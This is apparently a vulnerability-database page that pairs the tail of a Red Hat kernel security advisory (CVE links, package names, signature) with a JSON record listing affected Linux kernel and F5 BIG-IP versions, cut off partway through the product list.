x86_64: kernel-debug-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-514.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-514.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-514.el7.x86_64.rpm perf-debuginfo-3.10.0-514.el7.x86_64.rpm python-perf-debuginfo-3.10.0-514.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2013-4312 https://access.redhat.com/security/cve/CVE-2015-8374 https://access.redhat.com/security/cve/CVE-2015-8543 https://access.redhat.com/security/cve/CVE-2015-8746 https://access.redhat.com/security/cve/CVE-2015-8812 https://access.redhat.com/security/cve/CVE-2015-8844 https://access.redhat.com/security/cve/CVE-2015-8845 https://access.redhat.com/security/cve/CVE-2015-8956 https://access.redhat.com/security/cve/CVE-2016-2053 https://access.redhat.com/security/cve/CVE-2016-2069 https://access.redhat.com/security/cve/CVE-2016-2117 https://access.redhat.com/security/cve/CVE-2016-2384 https://access.redhat.com/security/cve/CVE-2016-2847 https://access.redhat.com/security/cve/CVE-2016-3070 https://access.redhat.com/security/cve/CVE-2016-3156 https://access.redhat.com/security/cve/CVE-2016-3699 https://access.redhat.com/security/cve/CVE-2016-3841 https://access.redhat.com/security/cve/CVE-2016-4569 https://access.redhat.com/security/cve/CVE-2016-4578 https://access.redhat.com/security/cve/CVE-2016-4581 https://access.redhat.com/security/cve/CVE-2016-4794 https://access.redhat.com/security/cve/CVE-2016-5412 https://access.redhat.com/security/cve/CVE-2016-5828 https://access.redhat.com/security/cve/CVE-2016-5829 https://access.redhat.com/security/cve/CVE-2016-6136 https://access.redhat.com/security/cve/CVE-2016-6198 https://access.redhat.com/security/cve/CVE-2016-6327 https://access.redhat.com/security/cve/CVE-2016-6480 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/7/html/7.3_Release_Notes/index.html

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iD8DBQFYGvnGXlSAg2UNWIIRAt0KAJ9EHwzXCUk4h0/OWw0UutzqBegyHQCgudbG nc4j6RLeW23njfwjT51CsVU= =N1Fg -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201606-0329",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "suse linux enterprise real time extension",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "novell",
        "version": "12"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.37"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.1.28"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.18.37"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.12.62"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.14.74"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.10.103"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.6.5"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.2.82"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.19"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.16"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.15"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "linux",
        "version": "4.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.13"
      },
      {
        "model": "big-ip afm hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "big-ip apm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip gtm hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "big-ip ltm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.1"
      },
      {
        "model": "big-ip analytics hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.10"
      },
      {
        "model": "big-ip analytics build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.110.104.180"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.37"
      },
      {
        "model": "big-ip aam build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.40.1.256"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.16"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.80"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.6"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.15"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.3"
      },
      {
        "model": "big-iq device",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "big-ip ltm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.110.104.180"
      },
      {
        "model": "big-ip afm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "big-ip gtm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.38"
      },
      {
        "model": "big-ip analytics hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "big-ip apm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.8"
      },
      {
        "model": "big-ip apm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip afm hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip asm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip apm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip link controller build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.01.14.628"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.7"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.2"
      },
      {
        "model": "big-ip link controller hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip aam hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.2"
      },
      {
        "model": "big-ip link controller hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.1"
      },
      {
        "model": "big-iq device",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "big-ip pem hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "big-iq device",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.6"
      },
      {
        "model": "big-ip pem hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.2"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.65"
      },
      {
        "model": "big-ip afm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "big-ip aam hf11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip afm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip link controller hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.14"
      },
      {
        "model": "big-ip apm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip apm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-iq device",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.2"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.45"
      },
      {
        "model": "big-ip aam hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip apm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip aam hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.6"
      },
      {
        "model": "big-ip afm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.01.14.628"
      },
      {
        "model": "big-ip aam hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.30"
      },
      {
        "model": "big-ip asm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.5"
      },
      {
        "model": "big-ip analytics hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.88"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "big-ip psm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63-2"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.9"
      },
      {
        "model": "linux enterprise server sp2 ltss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.22"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.3"
      },
      {
        "model": "big-ip afm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.15"
      },
      {
        "model": "big-ip asm hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.5"
      },
      {
        "model": "big-ip gtm hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.267"
      },
      {
        "model": "big-ip pem hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip aam hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip gtm hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.7"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip ltm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip webaccelerator hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.214"
      },
      {
        "model": "big-ip afm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "big-ip afm hf11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4"
      },
      {
        "model": "traffix sdc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.3"
      },
      {
        "model": "big-ip pem hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.8"
      },
      {
        "model": "big-ip link controller hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip ltm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip link controller hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.7"
      },
      {
        "model": "big-ip link controller hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip afm hf2",
        "scope": "eq",
        "trust": 0.3,
